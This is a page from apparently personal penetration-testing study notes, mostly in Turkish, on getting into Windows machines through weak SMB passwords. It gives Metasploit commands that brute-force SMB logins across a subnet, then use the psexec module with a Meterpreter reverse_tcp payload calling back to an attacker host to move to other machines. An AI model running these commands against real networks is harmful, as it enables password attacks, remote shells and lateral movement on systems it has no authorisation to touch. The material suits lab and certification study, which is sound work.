messy security notes
  • security is an illision
  • Useful Blog Links
  • Windows
    • ad-101
    • MS17-010
    • SMB
    • Post Exploitation Tricks
    • DCOM/RPC
    • Basic Commands
    • SMB Enumeration
  • Linux
    • SUID Set Edilmiş servicectl Abuse Etme
    • sudoers dosyası bozulursa?
    • SSH Welcome Message and Banner
    • pkexec ve pkttyagent
    • vipw , vigr , visudo
    • IP Forwarding
    • İki NIC Arasında Port Yönlendirme
    • tasksel
    • LAMP
    • Find All SUID Bit
    • Linux Operatorler
    • IFS
    • Ssh Public Key Tricks
    • Local & Remote Port Forwarding
    • Linux Priv Esc
    • Static IP
  • POST EXPLOITATION
    • from external network to domain admin
    • post exp 2
  • OSCP
  • Temel Komutlar ve Araçlar
  • Zayıf Servisler
  • Örnek Bir Senaryo
  • Parola Saldırıları
  • ms17-010 python exploit
  • Full Interactive Shell
  • Notes*
  • Apache James Server 2.3.2 Exploit
  • windows exploit suggester
  • FreeBsd and Some PHP tricks
  • fundamental blog
  • Metasoloit & Meterpreter & msfvenom
  • at-tftp server 1.9
  • Tunneling and Forwarding
  • Common Exploits
  • Windows Servisler
  • Execute process as another user
  • Teorik
    • Authentication and Authorization
    • Kullanıcı Hesap Türleri ve Hakları
    • Kerberos
  • SYSTEM
    • Apache2
    • Bind9 Log
    • apache - basic auth - proxy
  • Buffer Overflow - BOF
    • BOF - Stack Based
    • BoF Links
  • BASH SCRIPTING
    • Samples
  • keepnote
  • Docker
    • Docker
  • Misc
    • 50-cloud-init.yaml
Powered by GitBook
On this page

Was this helpful?

  1. Windows

SMB

Zayıf SMB Parolası Sonucu Makineye Sızma

Öncellikle smb brute force atılır.

msf > use auxiliary/scanner/smb/smb_login
msf > set RHOSTS 192.168.1.0/24
msf > set SMBUser victim
msf > set SMBPass s3cr3t
msf > set THREADS 50
msf > run

Brute force sonucunda bir kullanıcıya ait smb bilgileri elde edildikten sonra psexec modülü kullanılarak diğer makinelere sıçramaya çalışılır.

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.57.133
msf exploit(psexec) > set LPORT 443
msf exploit(psexec) > set RHOST 192.168.57.131
msf exploit(psexec) > set SMBPass xx:xx
msf exploit(psexec) > exploit
PreviousMS17-010NextPost Exploitation Tricks

Last updated 3 years ago

Was this helpful?